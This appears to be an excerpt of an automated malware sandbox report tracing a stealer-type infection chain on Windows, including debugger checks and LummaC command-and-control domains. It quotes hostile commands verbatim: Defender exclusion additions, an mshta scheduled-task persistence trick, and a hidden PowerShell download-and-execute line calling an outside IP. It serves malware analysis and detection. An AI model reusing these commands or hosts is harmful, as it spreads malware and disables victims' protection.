                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeCode function: 5_2_04DA0B97 rdtsc 5_2_04DA0B97
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C53AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6C53AC62
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeCode function: 5_2_004B652B mov eax, dword ptr fs:[00000030h]5_2_004B652B
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeCode function: 5_2_004BA302 mov eax, dword ptr fs:[00000030h]5_2_004BA302
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FD652B mov eax, dword ptr fs:[00000030h]6_2_00FD652B
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FDA302 mov eax, dword ptr fs:[00000030h]6_2_00FDA302
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00FD652B mov eax, dword ptr fs:[00000030h]7_2_00FD652B
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00FDA302 mov eax, dword ptr fs:[00000030h]7_2_00FDA302
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess token adjusted: Debug
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C53AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6C53AC62
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeMemory protected: page guardJump to behavior

                                      HIPS / PFW / Operating System Protection Evasion

                                      barindex
                                      Yara detected Powershell download and execute
                                      Source: Yara matchFile source: amsi32_1228.amsi.csv, type: OTHER
                                      Source: Yara matchFile source: amsi64_1696.amsi.csv, type: OTHER
                                      Source: Yara matchFile source: amsi64_980.amsi.csv, type: OTHER
                                      Source: Yara matchFile source: amsi64_7768.amsi.csv, type: OTHER
                                      Source: Yara matchFile source: Process Memory Space: DLTDCR8UJINP8YM8Y.exe PID: 7656, type: MEMORYSTR
                                      .NET source code references suspicious native API functions
                                      Source: 10DCQZI[1].exe.15.dr, Program.csReference to suspicious API methods: SABPDelegates.SABP(GetModuleHandle, GetProcAddress, VirtualProtect)
                                      Source: 10DCQZI[1].exe.15.dr, Program.csReference to suspicious API methods: SABPDelegates.SABP(GetModuleHandle, GetProcAddress, VirtualProtect)
                                      Source: 10DCQZI[1].exe.15.dr, Options.csReference to suspicious API methods: VirtualAlloc(IntPtr.Zero, (uint)array.Length, 12288u, 64u)
                                      Adds a directory exclusion to Windows Defender
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp'
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp'
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                      LummaC encrypted strings found
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1703880304.0000000005130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1703880304.0000000005130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1703880304.0000000005130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1703880304.0000000005130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1703880304.0000000005130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1703880304.0000000005130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1703880304.0000000005130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1703880304.0000000005130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1703880304.0000000005130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: fancywaxxers.shop
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\GIIIIJDHJE.exe"Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Documents\GIIIIJDHJE.exe "C:\Users\user\Documents\GIIIIJDHJE.exe" Jump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe "C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe"
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe "C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe"
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" "
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp'
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess created: C:\YQNZByFp\jyidkjkfhjawd.exe "C:\YQNZByFp\jyidkjkfhjawd.exe"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\.hta"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\\random.hta"
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C584760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,2_2_6C584760
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C461C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,2_2_6C461C30
                                      Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exe, 00000005.00000002.2009313233.00000000006C1000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, skotes.exe, 00000006.00000002.2049997565.00000000011E1000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000007.00000002.2049697799.00000000011E1000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Program Manager
                                      Source: DLTDCR8UJINP8YM8Y.exe, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2274307439.0000000000B48000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: 1FProgram Manager
                                      Source: iSHmPkn.exe, 00000010.00000002.2504764685.0000000000874000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: MProgram Manager
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C53AE71 cpuid 2_2_6C53AE71
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1026818021\am.cmd VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1026818021\am.cmd VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1026850001\rsn.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1026850001\rsn.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
